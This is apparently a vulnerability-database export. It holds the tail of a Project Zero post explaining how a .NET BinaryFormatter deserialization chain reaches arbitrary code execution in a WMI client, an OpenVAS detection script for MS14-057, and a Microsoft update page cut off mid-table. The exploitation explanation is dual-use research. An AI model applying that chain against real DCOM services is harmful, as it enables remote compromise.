But perhaps looking at the implementation of [GetResourceString](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/mscorlib/system/environment.cs#L1331>) will make it clearer:\n\ninternal static String GetResourceString(String key, params Object[] values) { \n String s = GetResourceString(key); \n return String.Format(CultureInfo.CurrentCulture, s, values); \n}\n\nThe Hashtable key is passed to GetResourceString within the values array, alongside the name of a resource string. The resource string is looked up and, together with the Hashtable key, passed to String.Format. The resulting resource string has formatting codes, so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization, kicking off the chain of events which leads to us loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client.\n\nYou can see the final implementation in the latest PoC I\u2019ve added to the [issue tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1081#c5>).\n\n## Conclusions\n\nMicrosoft fixed the RCE issue by ensuring that the System.Management classes never directly create an RCW for a WMI object. However, this fix doesn\u2019t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.\n\nAlso, this should be a lesson to never deserialize untrusted data using the .NET BinaryFormatter class. It\u2019s a dangerous thing to do at the best of times, but it seems that the developers have abandoned any hope of making secure serializable classes. 
The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted them to be or not.\n\n \nAnd as a final thought you should always be skeptical about the security implementation of middleware especially if you can\u2019t inspect what it does. The fact that the issue with IManagedObject is designed in and hard to remove makes it very difficult to fix correctly.\n", "modified": "2017-04-28T00:00:00", "published": "2017-04-28T00:00:00", "id": "GOOGLEPROJECTZERO:6D438BFA912DDE0EA057833C8B12B7AD", "href": "https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", "type": "googleprojectzero", "title": "\nExploiting .NET Managed DCOM\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:52:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS14-057.", "modified": "2020-06-09T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310804777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804777", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804777\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-4073\", \"CVE-2014-4121\", \"CVE-2014-4122\");\n script_bugtraq_id(70313, 70351, 70312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 11:15:20 +0530 (Wed, 15 Oct 2014)\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS14-057.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An unspecified error related to .NET ClickOnce.\n\n - An unspecified error when handling internationalized resource identifiers.\n\n - An unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to bypass certain security restrictions and compromise a\n vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.0, 4.5, 4.5.1 and 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3000414\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/ms14-057\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win8_1:1, win8_1x64:1,\n win2012:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n path = registry_get_sz(key:key + item, item:\"Path\");\n if(path && \"\\Microsoft.NET\\Framework\" >< path)\n {\n dllVer = fetch_file_version(sysPath:path, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2\n if((hotfix_check_sp(win2003:3, win2003x64:3) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.3000\", test_version2:\"2.0.50727.3661\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8636\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4252\")||\n 
version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6420\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8008\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.8600\", test_version2:\"2.0.50727.8614\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5484\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4 on Windows Server 2003, Windows Vista,\n if((hotfix_check_sp(win2003:3, winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.1000\", test_version2:\"4.0.30319.1025\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.2000\", test_version2:\"4.0.30319.2044\")))\n {\n security_message( port: 0, data: \"The target host was found 
to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2,\n if((hotfix_check_sp(winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34237\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36249\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2\n ## for Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1, win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34238\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36250\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of System.dll\n\n\n dllVer2 = fetch_file_version(sysPath:path, file_name:\"System.Deployment.dll\");\n if(dllVer2)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2\n if((hotfix_check_sp(win2003:3, win2003x64:3) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.3000\", test_version2:\"2.0.50727.3662\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4254\")||\n 
version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6423\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8011\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8600\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5487\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4 on Windows Server 2003, Windows Vista,\n if((hotfix_check_sp(win2003:3, winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.1000\", test_version2:\"4.0.30319.1028\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.2000\", test_version2:\"4.0.30319.2047\")))\n {\n security_message( port: 0, data: \"The target host 
was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2,\n if((hotfix_check_sp(winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34243\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36255\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2\n ## for Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1, win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34242\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36254\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of System.Deployment.dll\n\n\n dllVer3 = fetch_file_version(sysPath:path, file_name:\"mscorie.dll\");\n if(dllVer3)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4251\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6418\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 
for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8007\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5482\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of mscorie.dll\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:51:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "description": "<html><body><p>Resolves vulnerabilities that could allow elevation of privilege, remote code execution, or bypass the Address Space Layout Randomization (ASLR) security feature.</p><h2></h2><div class=\"kb-summary-section section\"><br/><a bookmark-id=\"appliestoproducts\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span></span></div><h2>Introduction</h2><div class=\"kb-summary-section section\">This security update resolves the following:<ul class=\"sbody-free_list\"><li>The vulnerabilities that could allow remote code execution if an attacker sends a specially crafted URL request that contains international characters to a Microsoft .NET web application.</li><li>The vulnerabilities that could allow elevation of privilege by improving how Microsoft .NET Framework communicates with the ClickOnce installer process.\u00a0</li><li>A security feature bypass vulnerability that could let an attacker bypass the Address Space Layout Randomization (ASLR) security feature. 
An attacker could use this ASLR bypass vulnerability together with another vulnerability, such as a remote code execution vulnerability,\u00a0to take advantage of the ASLR bypass to run arbitrary code.</li></ul><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS14-057. Learn more about how to obtain the fixes that are included in this security bulletin:\u00a0<ul class=\"sbody-free_list\"><li>For individual, small business, and organizational users, use the Windows automatic updating feature to install the fixes from Microsoft Update. To do this, see\u00a0<a href=\"http://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-1\" target=\"_self\">Get security updates automatically</a> on the Microsoft Safety and Security Center website.<br/></li><li>For IT professionals, see <a href=\"http://technet.microsoft.com/security/bulletin/ms14-057\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS14-057</a> on the Security TechCenter website.</li></ul></div><h2></h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-3\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-4\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware: <a href=\"https://support.microsoft.com/gp/cu_sc_virsec_master\" id=\"kb-link-5\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-6\" target=\"_self\">International Support</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section 
section\"><h4 class=\"sbody-h4\">More information about this update</h4>The following articles contain additional information about this update as it relates to individual product versions. The articles may contain specific information to the individual updates such as a download URL, prerequisites, and command-line switches.\u00a0<h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979578\" id=\"kb-link-7\">2979578 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972107\" id=\"kb-link-8\">2972107 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979577\" id=\"kb-link-9\">2979577 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows 8, Windows RT, and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2978042\" id=\"kb-link-10\">2978042 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows 8, Windows RT, and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979576\" id=\"kb-link-11\">2979576 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5.1 and the .NET Framework 4.5.2 for Windows 
8.1, Windows RT 8.1, and Windows Server 2012 R2: October 14,\u00a0</li><li><a href=\"https://support.microsoft.com/en-us/help/2978041\" id=\"kb-link-12\">2978041 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5.1 and the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 4</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979575\" id=\"kb-link-13\">2979575 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4 for Windows Server 2003 SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972106\" id=\"kb-link-14\">2972106 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4 for Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 3.5.1</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979570\" id=\"kb-link-15\">2979570 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972100\" id=\"kb-link-16\">2972100 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968294\" id=\"kb-link-17\">2968294 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li></ul><h5 
class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 3.5</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979573\" id=\"kb-link-18\">2979573 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972103\" id=\"kb-link-19\">2972103 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968296\" id=\"kb-link-20\">2968296 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979571\" id=\"kb-link-21\">2979571 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972101\" id=\"kb-link-22\">2972101 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968295\" id=\"kb-link-23\">2968295 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 2.0</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979568\" id=\"kb-link-24\">2979568 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972098\" id=\"kb-link-25\">2972098 
</a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979574\" id=\"kb-link-26\">2979574 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972105\" id=\"kb-link-27\">2972105 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968292\" id=\"kb-link-28\">2968292 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li></ul></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Update replacement information</h4>Update replacement information for each specific update can be found in the Knowledge Base articles that correspond to this update.</div><h2></h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">MSIPatchRegFix-AMD64.exe</td><td class=\"sbody-td\">5011CB29B096FB674A4795EE8FC2F7FDAD33863A</td><td class=\"sbody-td\">BA62C33DD90ECC3C945AE4F52EEEB2FA07D2C53FB975263B483D09D80F02230D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">MSIPatchRegFix-IA64.exe</td><td class=\"sbody-td\">CB861EAF1F4CDFFAD5F83604C7250CD9EDD96433</td><td class=\"sbody-td\">61867793FC7556B79E5833CC18F493A5611EDE94E0D944575E89BAA76B223A0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">MSIPatchRegFix-X86.exe</td><td class=\"sbody-td\">94A84B80B8B45A1AC53A0E5D085513DA0F099655</td><td class=\"sbody-td\">C83C5EE1D4FBFF5260A7D984471EAF4C6004431C21B4F661018BDB92CC124290</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-IA64.exe</td><td class=\"sbody-td\">181FFB6B8C6EAD42B9BE36232FD3FA8FFCC7DC11</td><td class=\"sbody-td\">D2EBA1536AE701CE315C70591D0310FFC05272C3CFAC269A574EA4688BE52059</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-x64.exe</td><td class=\"sbody-td\">EA41D17C2AA2115FBE4A86122C2B04B0DF939018</td><td class=\"sbody-td\">A82AA5DFE1296282537A05043F9C4B965C4FA230EFEBE17ADFC229E0644AF2C5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-x86.exe</td><td class=\"sbody-td\">9896D03074FE86CD49481DFC643FBA4D2060171C</td><td class=\"sbody-td\">E5B3B2CB9ADE9129545EB6875A18ACE5E8F6EF811FF610F804CBC6562F63FAEA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-IA64.exe</td><td class=\"sbody-td\">435C2F1A3867DC48572A92154E8784BD2C614C79</td><td class=\"sbody-td\">75ED560D6B5344BC8B1A1E8B2C5F8009D461A58B5A5A0C850B9CAEE257F71FEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-x64.exe</td><td class=\"sbody-td\">6A79FF5E419B3FD11449945EF2D24389E0B4ADF8</td><td class=\"sbody-td\">FAB19F92DCDC38F4EF83DD2D263147A3F35BF75B007F83D216F694F7BBE6C3BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-x86.exe</td><td 
class=\"sbody-td\">E9D7E292CFF96F768A99C2F2DBEBA9CA14784C70</td><td class=\"sbody-td\">D0E4B7A685E481D879D948F8C55783AD266ED4641C2355F3D515255C13C96FA6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-IA64.exe</td><td class=\"sbody-td\">7AB764B14D3F4B5E0093C970A761E59296C5F8A2</td><td class=\"sbody-td\">AFA5998D13A93A2807D18C283565D5C7A352CC1DE63FC069E8331E5DD21E0F9D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-x64.exe</td><td class=\"sbody-td\">4631DA8D6454B5680C0159B5254C15D54A8184E1</td><td class=\"sbody-td\">BD44D2CB053510E0CB0BC3BAAE97E34D06D241E4BFC6E03C974A4177E6E0C480</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-x86.exe</td><td class=\"sbody-td\">D4DC74D00B867FE7E2913292341BF86633CB601B</td><td class=\"sbody-td\">100938ADC6DBCD34775AFA58BCDA0B93D83F6270E3F00D0A6CBEDC779533759D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-IA64.exe</td><td class=\"sbody-td\">6FE17DD1B17066C83838B9C37816F50E923771D4</td><td class=\"sbody-td\">D016385E98986E973645D583102AA540B2ADB33DD0C5C50D5950D1BCDF58CFEA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-x64.exe</td><td class=\"sbody-td\">DB55951BF20173742751FEDA19432BC2F96DC3EE</td><td class=\"sbody-td\">3D42B4902F95686C38748E9F17C587E3109C44BECF00DF36A7DE7199C9E28B2E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-x86.exe</td><td 